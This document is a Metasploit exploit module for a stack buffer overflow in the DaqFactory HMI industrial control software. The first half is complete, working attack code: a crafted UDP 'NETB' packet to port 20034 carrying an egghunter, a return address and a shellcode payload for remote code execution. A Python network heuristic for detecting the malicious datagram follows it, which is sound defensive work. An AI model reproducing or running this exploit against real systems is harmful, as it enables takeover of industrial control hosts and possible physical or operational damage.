##
# $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DaqFactory HMI NETB Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Azeotech's DaqFactory
				product. The specific vulnerability is triggered when sending a specially
				crafted 'NETB' request to port 20034. Exploitation of this vulnerability may
				take a few seconds due to the use of egghunter. This vulnerability was one of
				the 14 releases discovered by researcher Luigi Auriemma.
			},
			'Author'         =>
				[
					'Luigi Auriemma',                           # Initial discovery, crash poc
					'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
				],
			'Version'        => '$Revision: 13750 $',
			'References'     =>
				[
					['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC'             => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
						{
							'Ret'    => 0x100B9EDF,  # jmp esp PEGRP32A.dll
							'Offset' => 636,
						}
					],
				],
			'DisclosureDate' => 'Sep 13 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				# Required for EIP offset
				OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
				Opt::RPORT(20034)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		eggoptions = {
			:checksum => false,
			:eggtag   => 'scar',
		}

		# Correct the offset according to the 2nd IP (DHCP) length.
		# Only dotted-quad lengths 5..15 are handled; any other length leaves
		# offset nil and the comparison below raises.
		iplen = datastore['DHCP'].length
		if iplen == 15
			offset = 78
		elsif iplen == 14
			offset = 79
		elsif iplen == 13
			offset = 80
		elsif iplen == 12
			offset = 81
		elsif iplen == 11
			offset = 82
		elsif iplen == 10
			offset = 83
		elsif iplen == 9
			offset = 84
		elsif iplen == 8
			offset = 85
		elsif iplen == 7
			offset = 86
		elsif iplen == 6
			offset = 87
		# attack class A ip, slightly unlikely, but just in case.
		elsif iplen == 5
			offset = 88
		end

		if offset >= 80
			pktoffset   = offset - 80
			finaloffset = target['Offset'] - pktoffset
		elsif offset <= 79
			pktoffset   = 80 - offset
			finaloffset = target['Offset'] + pktoffset
		end

		# springboard onto our unmodified payload
		p = Rex::Arch::X86.jmp(750) + payload.encoded
		hunter, egg = generate_egghunter(p, payload_badchars, eggoptions)

		sploit  = "NETB"                                    # NETB request overflow
		sploit << rand_text_alpha_upper(233)
		sploit << "\x00"                                    # part of the packet structure
		sploit << rand_text_alpha_upper(offset)             # include the offset for the DHCP address
		sploit << make_nops(2)
		sploit << hunter
		sploit << rand_text_alpha_upper(52 - hunter.length - 2)
		sploit << [target.ret].pack("V")
		sploit << rand_text_alpha_upper(12)
		sploit << Rex::Arch::X86.jmp_short(-70)
		sploit << egg
		# packetlen needs to be adjusted to a max of 0x400 as per advisory
		sploit << rand_text_alpha_upper(finaloffset - egg.length)

		# The use of rand_text_alpha_upper() ensures we always get the same length for the
		# first IP address. See the following for more details:
		# http://dev.metasploit.com/redmine/issues/5453
		sploit[12,4] = rand_text_alpha_upper(4)

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end
end
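The module above fixes several structural facts about the malicious datagram: it is a UDP "NETB" request to port 20034, it is padded with rand_text_alpha_upper() filler so that the whole packet lands on the 0x400-byte ceiling the advisory cites, and its default egghunter tag is 'scar'. A defender can turn those facts into a simple network heuristic. The following Python is an added example and is not part of the Metasploit module or of DaqFactory: the port, the 0x400 limit, the NETB prefix and the tag come from the module, while the 512-byte baseline and the 64-byte uppercase-run threshold are assumptions that must be tuned against real DaqFactory traffic. The two datagrams in the block are constructed samples, not captures.

```python
import re
from dataclasses import dataclass, field

# Values taken from the Metasploit module above
DAQFACTORY_PORT = 20034        # Opt::RPORT(20034)
NETB_MAGIC = b"NETB"           # request type in which the overflow is triggered
MAX_NETB_LEN = 0x400           # packet length ceiling the module cites from the advisory
EGG_TAG = b"scar"              # the module's default egghunter tag (:eggtag => 'scar')

# Assumed detection thresholds (not from the page); tune against legitimate traffic
SUSPECT_LEN = 512              # a NETB request at least this large is treated as anomalous
MIN_FILLER_RUN = 64            # rand_text_alpha_upper() padding shows up as long [A-Z] runs


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def longest_upper_run(payload: bytes) -> int:
    """Length of the longest run of ASCII uppercase letters in the payload."""
    runs = re.findall(rb"[A-Z]+", payload)
    return max((len(r) for r in runs), default=0)


def inspect_netb_datagram(payload: bytes, dst_port: int) -> Verdict:
    """Score one UDP datagram; only NETB requests to the DaqFactory port are examined."""
    verdict = Verdict(False)
    if dst_port != DAQFACTORY_PORT or not payload.startswith(NETB_MAGIC):
        return verdict

    size = len(payload)
    if size >= MAX_NETB_LEN:
        verdict.reasons.append(f"NETB request of {size} bytes reaches the 0x400 ceiling")
    elif size >= SUSPECT_LEN:
        verdict.reasons.append(f"NETB request of {size} bytes exceeds the {SUSPECT_LEN}-byte baseline")

    run = longest_upper_run(payload)
    if run >= MIN_FILLER_RUN:
        verdict.reasons.append(f"uppercase filler run of {run} bytes")

    # generate_egghunter() prefixes the payload with the tag twice, so "scarscar" is the marker
    if EGG_TAG * 2 in payload:
        verdict.reasons.append("doubled egghunter tag 'scarscar' present")

    verdict.suspicious = bool(verdict.reasons)
    return verdict


# Constructed samples (not captured traffic): a short request, and a datagram shaped like the
# module's output: "NETB", 233 bytes of filler, the NUL, then filler up to exactly 0x400 bytes
BENIGN_NETB = NETB_MAGIC + b"\x01\x00\x00\x00"
CRAFTED_NETB = NETB_MAGIC + b"A" * 233 + b"\x00" + b"A" * (MAX_NETB_LEN - 4 - 233 - 1)

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_NETB), ("crafted", CRAFTED_NETB)):
        result = inspect_netb_datagram(pkt, DAQFACTORY_PORT)
        print(name, len(pkt), result.suspicious, result.reasons)
```

The length check alone is the most robust of the three signals, because the filler characters and the egg tag are trivially changed by whoever runs the module, whereas the packet has to reach the 0x400 boundary for the overflow to work as written. The uppercase-run and tag checks are there to give an analyst corroborating context, not to be relied on in isolation.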